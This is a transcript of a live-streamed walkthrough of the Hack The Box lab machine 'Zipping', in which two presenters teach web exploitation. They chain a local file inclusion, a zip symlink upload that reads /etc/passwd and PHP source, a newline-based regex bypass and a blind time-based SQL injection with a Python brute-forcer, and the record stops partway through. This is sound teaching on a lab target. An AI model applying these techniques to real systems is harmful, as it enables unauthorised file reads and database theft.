Ergens, And we're live. Very good. I forgot to do the countdown timer, so that's horrible. I'll do the countdown timer anyways. No, I'll not do it.
No countdown timer.
No, I forgot. I clicked on go live, so sorry. All the excitement for nothing.
Gone.
Gone. Yeah. So, hi everybody, welcome. I see a big group of people already joining the YouTube. So, yeah, welcome. I'm Arjen. That's Bagger. There we go. Also known as Sop.
Sop.
And today we're going to do. Yeah, whatever you want. And today we will do a walkthrough of zipping. It is a very fun box. It's a medium difficulty box, and it is medium, I think, due to the privilege escalation step, and a little bit due to the fault hold. Without giving much away, we will be exploring databases and some reverse engineering today. So it will be fun. In case you're a student or former student of mine, that we know we have a large group here, your software security skills will be tested to the max. So, yeah.
There will be pop questions. There will be pop questions concerning binary reversing or whatever reversing it is in the chat.
We'll see. I will share a screen. What do I want? I want my colleague, please. Thank you. Yes, allow. And add it. Yeah, there we go. Look at that. A beautiful screen. And it works. Let's see if there's any comments in the thingy at the moment for not working things. That's always good to know. There you go. Pinto in it. Yes, beautiful. All right. So our beautiful zipping machine. I have already started the machine, and I have not done a nmap yet, but let's do that. And will be not very exciting. It is only port 22 and port 80, and it is the zipping watch store, which is awesome, of course. A website, so we don't have a lot to look at, so the only thing that we really can do is start a web browser. I'll actually use Burp. Oh, you want to add something?
No, it's Ubuntu. Everything seems recent. SSH 9, 2454 for Apache.
It is very up to date. It's a relatively recent machine. I think it's from September, if I remember correctly. So we noticed that it's very up to date. Also, Apache is up to date.
And the amount of CVEs used nowadays on Hackerbox is going down. And on recent machines, especially with OpenSSH and Apache, no chance.
Yeah. We'll do the HTTP. I started Burp to actually start this browser because obviously the entry point will be through HTTP the website, so it's a good practice to just start your burping experience right away. It will be in the background here. We'll see history. It has already the history. But let's first just take a look at the website itself. It is not very strange. It's just a company template website thingy. I think there's even a video type thingy here. Well, maybe not. Contact form. This will just go to the website itself. So that's not very interesting. All these thingies, all these links go somewhere on the page, except for this shop page. This shop page has a very nice standard shop thingy. We can look at some watches, which is quite interesting. From here, you'll notice in the browser that it is already that you will know that it's a PHP website.
page and with a page name and an index. I have so many questions.
Yes. What was the first thing you would do if you find something like this?
First thing, I would go for something called IDOR, indirect object reference, and I would go for iterating the ID. Should we show off? I don't think we've ever done that. Burp capabilities.
Burp intruder.
Yes. It's in the community edition, right?
Yeah, it's very limited, but we can show it.
I don't think we ever showed burp intruder on stream.
No, that's true. That's true. So we have this page, this beautiful watch page, and if you follow along with us, try and find stuff on this page already. It's quite interesting. So if you have something with this, with an ID like this, you might want to try different ones. I already did some, and you notice that product does not exist starts at ID 6, I believe.
Yeah.
But we can also give it a try and within burp, go and do the send to intruder. The send to intruder will send the request to the intruder tab, and it will allow us to actually explore this page. What we want is this ID to be something that we control, that we can add a variable to. So we do that through this add thingamajiggy. I actually know what this is because my son is doing Greek now, and I saw this sign somewhere, but I need to look at his books, but I'll do that when he's asleep.
Anyway, I actually, I never had Greek. The only place I remember it is from an old text-based DOS game from the 80s.
Yeah. So we have this variable and we can add a payload. I'd like to, in this case, I know it's a number, so we can do numbers sequential from 0 to 1 to 10. The standard version of burp will slow down dramatically after that. So it's not very useful, but it's fun to know. If we have that, we can just click start attack. Yeah, bye-bye. And then we'll notice that there's a difference.
There is a difference, especially with payload 0.
0 and after 0. So 0 will lead to a product does not exist. Then 1, 2, 3, and 4 will lead to a page that has content, and then from 5 it does not exist. So it's very useful. You can also use this for things like, I don't know, password spraying and stuff like that. If you're so inclined.
It's basically FUF variant.
So we could argue or think that this data comes from a database. So we could try and add stuff to this URL, like a quote, to see what happens. Well, the quote drops us immediately back to the general page. So that's somewhat of a hint. Obviously, it did not go correctly, and it just decided to do something else.
And there's pages product, and the moment it says page, I think local file inclusion, or at least local file read.
Yes. So since this is a PHP application, we know that from the URL. There is this pattern in PHP in which a application is passed a parameter, and that parameter indicates which page should be included as part of a template. And if you don't do that correctly, you can include other things, because now it will include product page or page product. This could be as simple as product.php, which gets included. We can give this a try by saying index, for instance.
There is a question if the font can be increased, specifically also in the title bar.
Yeah.
Could you run high DPI mode? High DPI.
I'm not going to do that. I will highlight it, because then it will be very massive.
Very big. Yes.
we can try these type things, and I'll put it in a. I will compromise, and I'll open. No, I don't want to restore it. I don't know what kind of incriminating things I did. So if we would go to the URL page /index, it will actually try to get the index for zipping.html. So for the
without file
level
extension.
that's up there. Without a file extension. The original did not have a file extension as well. And we see that the content changes. So here there is indeed a local file inclusion. We could do it even further, see what happens. And apparently when something goes wrong, we just go back to the default page type thing.
And if we add 100 dots /etc/passwd, just to let's start there.
Yeah, well, I'm going to say that will not work because we already noticed that it does not take a extension, so this file will not exist. But let's remember this. Let's try some other things.
There would be two things I would standard try: db.php and config.php.
Yes, but we saw that it will actually execute the PHP because the content came.
Oh, yeah. It's okay. So it's a full local file inclusion and not a file read.
Yeah.
Okay.
Yeah.
Base64 encoded.
Maybe. Well, we can try that afterwards because else we go down in the rabbit hole and will not be finished before 8, before going through this machine shop page. But that's very interesting.
So
very
many
interesting.
things.
Yeah. So the other was contact, and the other one is work with us. Work with us is even more yellow, especially for Mr. Yellow in the chat. And work with us says, if you are interested in working with us, do not hesitate to send us your curriculum. The application will only accept zip files. Inside them, there must be a PDF file containing your curriculum.
Given the name of the box,
zipping.
First question in chat: who can name this within 30 seconds? What's the name of the attack in the vulnerability?
Oh yeah, there's a delay, so you need to have a very extensive. Yeah. All right. Let's see if there's any.
It's quiet. Yeah. There's multiple chats. So,
is this the new zip CVE? Is there a new one? What is the new one? My lovely assistant will grab it.
I have no clue. I am googling now.
In the meantime, I will do as instructed. I will just make a file, touch CREDMP.pdf, and I will make a CREDMP.pdf zip. PDF. I probably don't do this correctly. Let's see. Apparently I do. Create a zip file with a PDF and let's see what happens, just to get a global idea. This is the wrong zip. This will give me a reverse shell. That's not a good one. The zipping live is much better. So if we do this and we do upload, it's quite instantaneous. There's a and this is important for Chris because he will want to do a one-click run a script and have an exploit. There's an uploads folder with a hash, and this hash 517A. I think it's the same as the MD5 sum of the.
Given the length,
file.
It's MD5.
Yeah. Yep. So it is actually the MD5 sum of the zip file. But we can open this in a new tab. And in this case, it will tell us 404 not found. I wonder if it's just because my file was empty. Let's add something to it. Let's echo Arjen to the PDF file. Right, I'll remove the zip file. Let's create a zip file and
Mr.
upload it
Dead Beef
again.
thinks he can't one-line it. I think you can. Come on, you can do better, Dead Beef. This is still one-lineable.
Yeah, this is simply a script creating a zip file, then uploading it, calling the upload here, which is unauthenticated, and then calling the get on this one. So that should be fine.
Yes.
Yeah. So with content, it gives me a bad PDF. If we would just curl this, curl, it says iron. So my content gets through. From here, we also know that there's no content check of the PDF. It just checks the extension for PDFs. So that's quite interesting.
I still haven't heard the attack. There's apparently some 7-zip CVEs of 2023. No, this is, think, 10 years back, 15 years back. But,
let's take a look. Zip Symlink CVE. I don't know. I don't even know if it's a CVE.
Lack of sensation of paths now.
Zip based zip slip and zip Symlink upload.
Yes.
I'll just quickly give it away what attack is that we'll be doing. But we'll do something called I think it's a zip slip, right? The zip symlinking thing.
Yeah.
Yeah.
I know it as zip slipping. But, I know it as zip slipping.
Yeah. So we are able to upload a zip file. And this zip file can contain files. It has to have a PDF. But the zip files are very useful in the sense that you can put files in them. But with a minus help, with a man page of zip, you'll notice that there's also a symlinks option. For Unix, store symbolic links as such in the zip archive instead of compressing and storing the file reference. So you can actually
and for
create...
Fox VMS if you ever find one.
Yeah, of course. Who doesn't use it? So we can create a symbolic link to a file and then call that a PDF, zip it, and then if all works, it will unzip the file and the symlink will be restored. So to give that some perspective, so let's not do everything at all at once. Super helpful commands in my shell. So let's.
You could just nuke your ZSA system.
Yeah, but then all the useful stuff will also be gone. So
true.
I like to go back in history and watch it. So if I create a symbolic link with lots of dots, because we don't know where we are in the file system, so we do a lot of dots. And what the effect will be if at one point we hit the root of the file system, all the dots will just go to the root. So that doesn't really matter. And then call etc password, because we know it's a Ubuntu machine and etc password is always there. I will call this password.pdf. And on my machine, we will notice that it is a symbolic link. And if we pass WD it will get all the entries in my machine. So there is this zip --sim links. I need to remove the other one because else it will add it. The application will yell at you if there's multiple entries in it. So zip --symlinks credmp.zip pass wd pdf. So it adds it, which is awesome. And if we have success, zipping live, there we go. And we upload it, we copy the link, copy link address, and we do a curl. We should actually get the contents of the file, which is the passwd of this system. And this is where it gets interesting, because we have found a way to just do magic, get files from the system and explore those. So that is awesome. So my question now becomes, what do we do with this?
First, we take notes because note taking is handy of users that have a shell that ends in sh. In this case,
Yeah.
retro.
So we could just do this grep -e. No.
sh dollar.
Almost sh dollar. My brain did not work. Almost. It's -e.
Minus
Why does it not work?
capital E is the Perl one. Just curl minus silent s. Curl minus.
No, the file got removed.
It's a one use. Okay.
The file got removed. I'll upload it again.
And usually it's minus s silent, so you don't get progress, etc. That can mess up things.
Grep -e sh dollar.
Yes.
Right. So there's two users that can log in, root and rectu. So that's quite interesting. Both have bash. So,
can you upload a reverse shell?
Well,
actually, that might be a thing. But how do you trigger it?
This is quite interesting. If we go to the machine page, hack the box, box.com, this was possible. That was very much possible. What Ida is saying, to upload a reverse shell, and they patched it. I don't know my password.
Yeah, I can't.
Do you know my password? No. There we go.
All
right.
You're still sharing. Look. Just saying.
Yeah, nobody saw my password. No. It's all good, because the one-time password thingy, or the one-time token, is a token. So it's one time. So welcome to the Hacker Box. If we go to zipping, and we go to it, Ida has a very good idea, and that used to work. Added an additional check in a patched unintended solution.
With no byte injection. Okay, that would work indeed. Yes. With a no byte injection, I can see it work.
Yeah. So apparently there was a patch today or yesterday. Game overlay. That's okay. What Ida suggests is to upload a PHP file, but it has to end in extension .pdf. That's what the thing said, and you can trust me that it checks that. But then you could add a null byte to the archive, and then add it .pdf. It will strip that, and then we will have a reverse shell. That was the first way people exploited this. But the actual exploit is much more interesting. So, yeah. So one thing that I figured out, or after some attempts, is to do the following, is to actually remove all this mess. Wait. Yes, thank you. And I will take a small script, zips, lfe.sh. I did not do a full script on this. I'm not Chris. I was too lazy to actually do it. But I created a small script that does a remove of the zip file, remove of the PDF, then creates a link to a path that I pass on, and then creates a zip file for it. So I don't need to do all the commands all at once. So if we
if you made a full script out of it, you could just for loop it over a word list and start brute forcing all the files.
Yeah, I was a little bit more subtle about that, because I know that it's an Ubuntu machine. Ubuntu stores its websites in /HTML. and we can just try that with the index.php. If they're not there, that's fine. And creates a zip file. So now it did this command using for html index.php, and we should get the starting source of the website. So let's give that a try. Zipping live, upload, copy. And I suspect Chris will have a full script in like a few minutes. But indeed, when we do that, we see that the website comes out. The zipping watch store. What else do we have here? Well, the full site that we already saw.
So we're looking at the headers and includes.
Yes. That's what I want to show. Of course, every PHP page basically starts with all the very important PHP stuff. This page is just simple, the HTML. So that's not very interesting. But if we take a look at the shop, which we just get from the URL that we already explored on the website, and we make a file for it, we upload it, and now you can basically guess some of the relevant names, but I just like to do it one by one. We get this very interesting page already. This is a shop that we already looked at, and if we take a look at it in the browser, so we go back to http zipping/shop. Go away. Shop, here we go. This is the standard page that we get. And if we click on one of the watches, we get the arguments page and ID. So apparently we already guessed or semi-guessed that page was actually a local file include of another PHP page. So we can see that in action here as well. It says blah, blah. Page is set to home.php by default, so it will go to home. So that happens. So it checks if page is set. If the file exists, it will include it using .php. And else it will just return home, and then it will actually include it. So apparently home is a thing, but that also means that product is a page. So we can give that a try, product.php.
And I'm now also not intended probably, but I'm thinking with string termination with 0 bytes, can we bypass the .php extension
in the zip? Now they fixed that
in the page.
Here, you can. That is easily tried, in the sense that you mean that if we do this, how many dots? And we do this a couple times, like this, hop, pop, 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 and do etc. pass WD, and you say %00.
Yes.
Yeah.
Okay. I don't know PHP well enough to. I was curious if that.
Yeah, that used to work. Nowadays, a standard one is patched for it. Did I remove it?
No, it's a cleanup timer.
Yeah, I made it. Oh, no, not that one. That will give us a shot. We don't need that. Upload. 904. Bam. So here we have our actual product page, which is quite interesting. And again, we can go through the entire machine using this, and that's quite interesting. I would highly recommend it. But this is not the interesting thing that is about this machine. This is pure automation, and if you want to have something to do like run a Python or create a Python automation out of it, it is a very good exercise. But our fun starts here, because my eyes fell on this line immediately after seeing that this ID was set here by a get ID, right? Get ID means the thing that I fill in as a user goes into this variable and is used in this SQL statement. And this is interesting.
This is certainly interesting.
Yes, but do you see the problem here?
Yes, I'm not doing the box myself at the moment, so I was wanting somebody to paste this one in chat, so I will just feed it to ChatGPT-4. I gave up. I mean, I'm done with doing regex manual. This is
man, I used to.
It's a catch all. It's a.
All right, this already goes nowhere. Let me explain how I do this. And remember, me as an old timer with this gray beard. Back in the day, back in the late 90s, when I used to live in the United States, I had a job as a Perl programmer. And one of my tasks as a Perl programmer was to write obnoxiously long regular expressions to parse log files. Since then, it has become dirt easy for everybody because there's a series of websites, regexer, I believe it's called, regexer, yes, in which you can just paste your regular expression.
Yes.
And then it will have a full explanation below here, and basically it says beginning any character, match any, and then followed by a character set that has pretty much every character known to man, or something
or a
that
number.
Is not a number, a negated set. So 0 to 9, but not that.
Oh, there's a caret sign in it. I missed that one. Okay, yep.
And then the end. And so what happens if we fill in something like this, and we say like 1, it is not matched. If we fill in something like lumpia, I will zoom a little bit. Can you go away? Thank you. If we do lumpia, there's a match. And if we do 1, there's not a match. Lumpia will hit this part here because it's A through Z. And it will hit this, where it says it does not end with a number. But lumpia 1 matches as well because at first it starts with a character set. And if we take a look at the logic, if this regular expression matches, then go to index.php.
Else do fun stuff.
Else do fun stuff. So when we earlier tried 1 with a quote attached to it, it actually matched this regular expression. But there is a mistake with this regular expression. And I do realize that you actually need some more in-depth experience with regular expressions to see it, I think.
It's a catch.
Let's see what the chat says.
Operating order is start of line catch all, either one, but parsing order, it's, oh no, the 2 single ones are blocked.
Yeah, you're barking up the wrong tree, but there's a small delay. So OK says there's a dot, so it matches anything.
There's actually a dot. There's actually a dot in the second group.
Yeah, but it's
not escaped.
Well, that's okay. Within a character set, a dot is assumed to be escaped. You cannot say do any character in a character set. So that's good. That's good. Yes. So, yeah.
What are
I'll give it a minute or 2.
What? Oh, wait. It's a. Okay. Can I give a hint, or shall we wait for chat?
No, we can give
It's
a
a
hint.
single line. It must be a single line.
Yes.
Start of line, end of
Well,
line.
it might. Yeah, there is indeed this regular expression matches only the first line.
Yes.
If you want to do it correctly, you would do the /g. Can I do it here? I don't think I can do it here. I can do this. Yeah, there we go.
Yeah, now it's global.
Now it's global. But if I do, let's say I do 1. 1 does not match this regular expression. So this passes through. And I do lumpias are awesome. Awesome. We notice that this regular expression, even though there's characters in it, does not match this text. If we do the flags to global, it still doesn't match. No, it doesn't match the multi-line.
No, because you have an
There we go.
enter behind it. You had yet another line behind it.
Yeah,
Oh,
no,
no.
I had the wrong flag. So
Okay.
this thing matches, but as soon as there's a new line right behind the 1, it will no longer match. It matches because I added the multi-line flag, but that is not set on this regular expression. So the mistake here is that the defensive operation is added, but is only assuming a single line. And how do we insert multiple lines in something that is one line?
Carriage return line feed? What was it again?
Carriage return line feed. Well, let's take a look at the ASCII table. Yeah, this goes to the basics.
Let's go OA.
And I must. Yeah, OA, indeed. Oh, go away. Let's see, where are you?
Man ASCII is, if you're too lazy to open something, Man ASCII.
Yeah, that's much better. Man ASCII. Nice.
There we go.
Very good. So number A, 0A, hex 0A, is the new line. And in a URL, we can actually pass an encoded new line, which is quite interesting. So to explore this, we cannot use the browser, because if you do a new line in a browser, it will just go grab your URL. So that's horrible. But remember, we were smart.
Could you go back to the regexp? We wanted to fail. Where's the \s?
Spaces. There's 8. There's anything, then A through Z.
But if you end with a space or tab, or should also fail it. Does it strip?
It does not strip, but you're saying if we end with a space, it still matches the first part. So
it matches.
So that doesn't go up. No.
Oh yeah.
No. So we're here. So let's open up the burp. We were smart. Sadly, we did much browsing through the website. So let's grab the page again, zipping. Let's do it here. Contemporary watch. Right. So burp is an awesome tool. Burp is fantastic because you can use something called repeater. We already saw intruder, but repeater allows us to play with things. I will remove this refer because that is annoying. And if we just do this, it will tell us, hey, this is the page. We can even render it if we wanted to and get the page. That's very nice. And so we said, if we pass something like a quote, and at this point, it is very handy to turn on URL encode as you type, because that saves a lot of hassle. So quote, if we send it, it says 302 go to index, because the regular expression does not match. But if we leave the quotes and add 0A, and this is the only time that I say that something's very useful, but it's not very useful. It needs to be %0a. If we do that, it will give us an error. It's horrible. But if we remove the quote, it will still do give it. Why do you give it? %0a.
Which is new line.
Yeah, that's correct. Let's remove this one. I did horrible things. There we go. Do this. Two. This is horrible. I apologize. I put the wrong thing in. So we have this one that works. It should just be 0a. Yeah, %0a. Yeah, I immediately went for a much more elaborate thingy. 0a, which is the new line, but now we messed up the SQL statement. So we need to immediately fix the SQL statement. So if we look at the code, where is it? Go away. The code here has the SQL statement. I assume it's readable.
Yes.
Let's see, where are you? SQL. So we have this SQL statement, and then we now have inserted new lines and stuff like that. So it starts to get horrible. So we need to fix things. First of all, we need to do a quote, and then we need to continue because the ID probably does not work. So I did something like this, and then a semicolon, and it's
you need to open the quote
with a 1. It needs to end with a number as well, I believe, if I remember correctly. I forgot the SQL statement. Yeah, I believe that was it. Let's give it a try. Yeah, okay. Because now we have the zipping store theme. Yeah, it needs to end with a number indeed, because the SQL will mess up. But we now have
one
access to the SQL statement. But what do we do now? We don't get any feedback, especially except for it works or it doesn't. So there's 2 categories of SQL injections that we can apply here. So in the area of paratenkennis,
I would go for first of all, I would test it with a timing-based attack.
Yes, timing-based. We can ask the database to do stuff for us. So
I would test it. Does this work? I would then say, okay, timing-based attack.
Yes. So in order to do a timing-based attack, and I will turn off the URL encode as type, so it is a little bit clearer what I'm typing. I would do select sleep 10, because 10 is a very good number. Semicolon. I will select this.
42 is better, but it's a bit long.
Yes, true story. So I will select it and press Ctrl U, so it will encode. I also need to encode this one. There we go. And send it. Oh, bad request. I did something horrible. And here it becomes finicky, because now we are delivered to the mercy of our typing gods. URL decode. I think there's semicolon. SQL injections are always quite difficult if you don't have any immediate feedback. There we go. So it requires a lot of finicking around, which in this case, we will notice that there is a blind SQL injection.
Yes.
You
could run this with curl and put a time command to actually see if it matches, but this looked like something like 10 seconds.
Yeah, there's actually here 10,015 milliseconds. Burp is so handy. It's so
Burp is great.
So now we get into an interesting area. How do we get data from a database if we don't see anything? Well, we can use time. Time is our ally. And we can probably guess Ubuntu. What kind of database would this be?
This would be a MySQL. Well, given it's a PHP application, 99%, it's a MySQL.
Yeah, there's something called a LAMP stack: Linux, Apache, MySQL, and PHP. So generally, it's that. So let's see. I don't think I have MySQL here yet. MySQL. Oh,
wow.
Do I have a MySQL server? I need to learn how to type.
I think you need systemctl started.
Systemctl start MySQL sudo make me a sandwich Kali MySQL minus u root.
Sure.
Okay. Now I do something very newbie. Kali.
And I'm actually thinking, oh yeah, you just need to edit pg_hpa, but that's not the file that we need. That's a different database.
Yeah, that's horrible. Let's see, you can log into MySQL to set the root. There we go. Follow the instructions, people. Always be following the instructions.
And don't be afraid not to know stuff, because we are really good at that.
Enter the password for root. Sure, go ahead. Change passwords.
Oh, you just switched to PAM. That's interesting.
Oh, I don't know. I just hit enter. No.
I think you just switched to PAM. Did you just change your PAM password?
Then it's root.
Okay.
No, go away. Yes. I just do the default thing. I do what users do, right? Next, finish. It works.
/DT. Is that also the one in MySQL?
No, it's show databases.
I always forget my MySQL syntax.
Yes. My SQL is quite interesting. Request query, then you can just type plain text. Oh, very good. Good tip, Renee. Thanks. So we're in a database, and we know we have some form of access. And let's say that we want to get the version number from the database. We can. Select version. And it will give us, in my case, 10.11 for MariaDB 1. But how do you do this if there is a blind SQL injection? Well, for the ones that followed software security in the tutorial for the SQL injection lesson, there's an entire thing about blind SQL injections. But for the ones not in the know, we can ask what if a character of a response matches something, which is quite funny, right? So let's do that with this one. I believe it is if, because we want to check, mid of select version. I think it's something like that. And mid, yeah, this one.
Comma.
Yeah. I think it's just version. I always have to look at my notes. 1,1. We can do that here, I think. Yeah. Equals. And now I need to do this. Yeah. Equals 1. Then do something. Sleep 2. Else 0. Something like this. 1, 2. Took 2 seconds. If we do it again and say 2, it says finished immediately. So by using mid, the function mid, and you can look it up in the MySQL documentation, we can grab something from a command. So select mid version 1.1. semicolon. We can see that it's 1 and the next character, 2, will be 0 and the next character will be a dot and go on like that. Or we can just do, give me the first 3 characters, give me the first 4 characters, 5 characters. And you see that we have something very useful. But it is not something that is easily done manually. So for this walkthrough, I thought it would be fun to actually write a blind SQL injection brute forcer together. I think that's a very nice bonding experience.
Okay, that's that's, and this is where the drawback of Actabox being the machines not being internet connected. For example, you could use a burp collaborator or any OS tooling to actually start triggering things to exfil data. That is easier, but you need public.
Yeah, but could you do a blind SQL injection using burp collaborator?
I think
probably
you
a plugin for it.
can trigger a DNS lookup, if I'm not mistaken. Now thinking what the path was.
Yeah, but what how do you get information from the database? You can make it do things, but you don't know what the information is.
What you could do is that you use query results in concatenation to a DNS.
You don't get any output data. Yeah,
no,
unless you can
you
do
get
an
it in your
export
collaborator or in
yeah,
your OS tooling.
True.
So
if you can force a DNS lookup in it,
or anything,
but you cannot do that. You cannot. You have to do it the hard way. Sorry. And I must say, this was one of the most favorite parts for me for the beautiful OSWE.
I so hate blind timing-based brute force.
I love them. I love them.
It's so annoying.
I love them because you can do things that look like magic, and we'll make it look like the movies. That will be the very fun part.
Okay, so I can't shortcut it and saying, "Ooh, it's blind." Can't I just I don't know 6xx because it's MariaDB?
No.
That would be my first step after I confirmed that it's blind via timing.
You can give it a try. Maybe even SQL map works, but I don't care.
No, as in sysexec SQL command to just say run this bash shell command for me.
Sure, but maybe you need to write it somewhere first. There's no. You can try it, but there's no execution on the machine. It's on MySQL itself.
Isn't sysexec a function?
You'd look that up. I'll write a script, right?
Yes, you write a script.
First of all, we want to do HTTP request, so we'll do import requests. We'll need some Puha with time, and we know that we need to URL encode something. So we can do an import of URL lib.parse. I'm not the best in Python things, so you forgive me if there's a better way to do it. So what do we have? In the end, we want to have a result, a word or something that we look up. I always call it word. And that starts out as a blank thing. Then we might, I don't know if you want, but we need to loop until we are done. So we can say found equals false. So we will start in a false position, and only if we have a found entry that we can say we're done. And we have a delay. Let's say 2 seconds. It's very nice. We can say, we have a, what do we have? Mr. Haas.
Mr. Haas already cheated and just.
No. ESP says, he has a script. Oh, nice. He has a
nice.
Script. I
For the
wonder
upload.
what it does. Does the upload?
This is the upload.
Yeah, beautiful. So we will tell it while not found. do something. This will be our loop, so we will move over it. And now I'll do something for which there's 100 different ways to do it, but we need to have characters to actually try as the field or the character of the thing that we're looking for. Let's call it ASCII value, a range of 33 to 123, I believe. Again, this comes back to the MAN ASCII. Where do we start?
Meanwhile, for a security research, I might have theoretically written some brute forces.
Nice. I will continue with this one first.
Yeah. And I was...
Okay.
I found a new permutation of command in...
but I will continue this first, and then if you have something, we'll take a look. So we can take a look at the ASCII table. There's a octal and decimal value. So if we go to number 33, number 32 is the space, number 33 is the exclamation mark, and all the way down it scrolls through the entire character set here, blah blah blah, and then it continues here above here. All the way here, all the alphabet, capital letters, some weird signs, lowercase letters, and that ends somewhere 122, 123. So judging from this, we should go all the way to 126. So let's do that. 126. And this means that we have a character that we can ask Python to create. And then we could print this, print car, and then say, look at me being all compiled language. And then just put found to true, so we can actually see what is going on here. And so if we make this executable blind, it will print out all the characters that we'll try. And what will happen is that we will use mid to find one character of the word and then check it against all of these things. And we'll use the time to see if it actually matches something, which is quite nice. And this is I like this approach. So we'll take into consideration the start time. So we'll take time that is now, and that means that somewhere along the end of it, we'll have the end time, and time dot time, and then we can use it or end time or duration. Duration is time minus the start time. It's Python, so we try to be concise, right? So, and that duration, if it is more than the delay minus a small value, it will actually have hit. So let's first start with the thing that we know that works. Subquery of a version. We know that works because every database, every SQL database, MySQL database will have a version command. Well, there's a comment. It's an we talk about lumpias, so that's very good. And then we can create a payload in which we will use this subquery to actually do something. This payload needs to be urllib.parse.quoted, and that will ensure that no violating characters will pass through the HTTP request. And from here, we can actually pass along our SQL part. And that SQL part will be the part that we have here, I think.
After, I would say, the select part. In the rest we
well, yeah, it depends on what we want to do indeed, but we can do that. But I'm stubborn. I'll do it my way.
Go for it.
Yeah, select. Yeah, select.
And sorry, what I was thinking in terms of brute forcing iter tools was library. Yeah. I didn't know, but Cartesian products, etc., out of the box.
Yeah.
Awesome.
It is itertools is very cool, especially if you want to do the advent of code in December. You will use itertools many times.
I never used it. It's awesome. I found it. I was writing a brute forcer, and it's really good.
Nice. Well, if we go back to our MySQL, did we have it here? I closed it already, right? Yeah, I closed it. So if I'll open it here.
Then you will need to Oh, you want to do it? Yeah.
So we did select mid version,
comma 1,1.
1,1. That will give us the digit 1. And if we want to ensure that it actually is the one that we have, because it's blind, so we need to have the time. So we can say if mid is 1, then sleep.
You're missing one. You're missing one. Oh no, you're not missing a closing bracket.
Trust me, I know what I'm doing.
Well, better than me.
So I did 10 now, which is horrible. But basically, we want this query to be executed, and then we can do it. And this part is the variable part, so I put it in the subquery. And then in payload, I will use this entire thing here, where this is the duration, so we can have a somewhat
and do you also
flexible.
And you also want to have a range, because you can extend this one. Use 1,1 for the mid.
Yes.
You can iterate over that, so you can iterate over which character it takes, etc.
We need a position to.
Which could be a for loop until.
Yeah, true.
That's the classic version of.
Yeah, okay, but I already committed to this one, so I'll fake it till I make it. Sleep for the duration.
Delay, it's called.
Right, delay. Thank you. Delay and else return 0. I think that's about it. But then we have the end with a number condition.
And we can speed it up with setting the delay to 1, because even a normal query will not return within 1 second. It will return within milliseconds. So the 2 is
something like that.
We can halve the time.
Yeah, we can halve the time. So we have this. So now we do the request. This will probably go horribly wrong, and that's okay, because we're professionals. It will be fine. Somewhat. I have never had a program that works in one go, so that's okay, right?
No, it's best.
Yeah, so we do a request. I use the F string, a format string, so I can actually use the curly braces to include
the query is incomplete, isn't it?
Why?
There's no comparison in it.
Oh, sorry. Is car. Thank you for that wonderful contribution. See, I told you it would be horribly wrong. It's fine. Zipping.htb, shop, index.php, question mark, page is product, and ID is 1% 0a, because that gets passed on directly, and then we add the payload here. Maybe to make it a little bit nicer, we can. Oh, we need to URL encode it. So that's fine. We do this, and then we can say that we grab the duration. Yeah, nice. I think a CTFL already did it, but if elapsed duration is greater or equal to the delay, then let's do word comes the car. Then we found something. So we found the character is part of the thing that we searched, because it took longer. And then we will print it, right? we can use this special nice /r. /r will actually mean go to the beginning of the line and print it here. So that's always good. Then we can have like a movie-like animation while we wait. True. Yeah.
You don't want to increase the precision and loop over it?
Yes, I do, but not here. Okay. Because that would mean that we always find something. So what I want is that we have the else. The for else is quite interesting. For else means that if the for loop completes, then do something. So we can say found becomes true. It completes, but due to the way we create it, it will do an iteration. And when it finds a character, it will break and continue with the next character. But if it never hits the break, it will complete its full range. And then it will fall into the else part, in which it basically is a finally put it to true, and so the while will stop working, which is quite neat trick. Did you know that one?
I'm not familiar with for else.
No, I learned it from ChatGPT.
There's a lot of languages that I've worked with. I've been doing more Python, but for else was not a construct I've worked with before.
No, I've never known it, but yeah, it's quite interesting. So zipping live. All right. So put in your money. I say it will fail miserably.
No, it will work. It will work.
Oh, nice. We noticed that it already does a lot of things. This is obviously not cool because there's no very sexy animation, but it will actually use time to grab information from database. So we did version, and now it will take version and character for character. Notice is 1 at position 1. Yeah, okay, continue to the next one. Is 1 at position 1, or actually 0? It's yeah, it takes more than 2 seconds. Okay, continue all the way until we get to the full string, which is quite interesting. You have the same reaction I had with this version string. This version string is very odd.
Yes, I'm looking at it's
Yes. Yeah, it's quite interesting. Normally, I would have expected this part, but apparently, this part is also part of it.
It's fine that there's a Ubuntu in it, but I'm looking at 0. I'm like, is that 0 bytes? No, that should not be 0 bytes. It sounds like a partial encoding return. I have no clue what I'm looking at.
I have no clue. And I will accept that stuff goes haywire when doing blind injections.
Yes.
I will accept that I do not have a very good good juju with with blind injections. There will always be.
There's a reason I try to avoid them, or break out as soon as possible.
So now the question becomes, what do we do now? Because we can do something from this table.
From this database, but we don't know what's in it. So the scary part is show tables.
Yeah. So let's give this a try. Let's grab the database here again. Hello, go here. MySQL.
You are in a database. No, you first need to use a database.
Use MySQL. Show tables. So this is a little bit time consuming because our injection will only work in the first row, or actually the row that is returned. If there's multiple, it's a little bit undefined, but we can give it a try.
Thinking how it
but
worked again on multi-row. There was a way to iterate over it as well.
yeah, of course. But there's something more interesting.
Yeah, information.
There's something called the information schema. Every MySQL database has an information schema. And in that information schema, you can find lots of information, which is very interesting for an information schema.
Sys schema in Oracle, if you come across those.
Yeah. And in order to save some time so we can go through all the privilege escalation in a little bit, you can explore this database through blind injection everywhere. One thing that I found very interesting is that during the exploration, we find out that it is possible to write files as well with a select into, which is very cool. MySQL supports that. MySQL selects into file, which is select. Is this the page?
Yeah, that's into out file.
No. Into out file. The client go away. MySQL select.
No, that's it was there.
File.
Select into out file.
Yeah, I just want something else that doesn't show me a gigantic thing. Select into out file. But if you try this and just try the TMP file folder, it will fail because it does not have any writes. So I spend a lot of time trying out different things. But what is the one directory that our beautiful MySQL database will have access to?
The MySQL database. So it runs under its own unprivileged user, dev SHM. And it will have access to, where does MySQL store its data files?
Well, that's a good question. And you know how to answer that question because you can
Google.
Configure that, of course. You can do select star from global variables. There you go.
Kleine Aiden says TMP. Arjen just said that TMP didn't work because it was too because of the privileges.
Yeah, it did not work for me. Etc. MySQL maybe. Yeah, temp. Yeah. Upload. Yeah, MySQL user did not have that.
Etc. MySQL, I would only expect read writes and never write
read
writes.
Access. Yeah, but we can use the database to figure out where we can actually store something. So this information schema has everything we need to know about MySQL databases or this MySQL database, and we can question this information schema to get the full thingy. So let's make
MySQL also say information schema dot global variables. Yeah. Awesome.
Yeah. So we can directly query it. And luckily for us, we created a system where we can actually add a query and then get the returning value. So let's pull that one up.
You can actually reference cross schema, which would almost look like MySQL is a proper database.
Almost. Don't overdo it, right? There is the question about this thingy. I'll make it some. Right. Select star. Yeah. Do I want star? I want variable name. Make sure that we have one column that we can brute force.
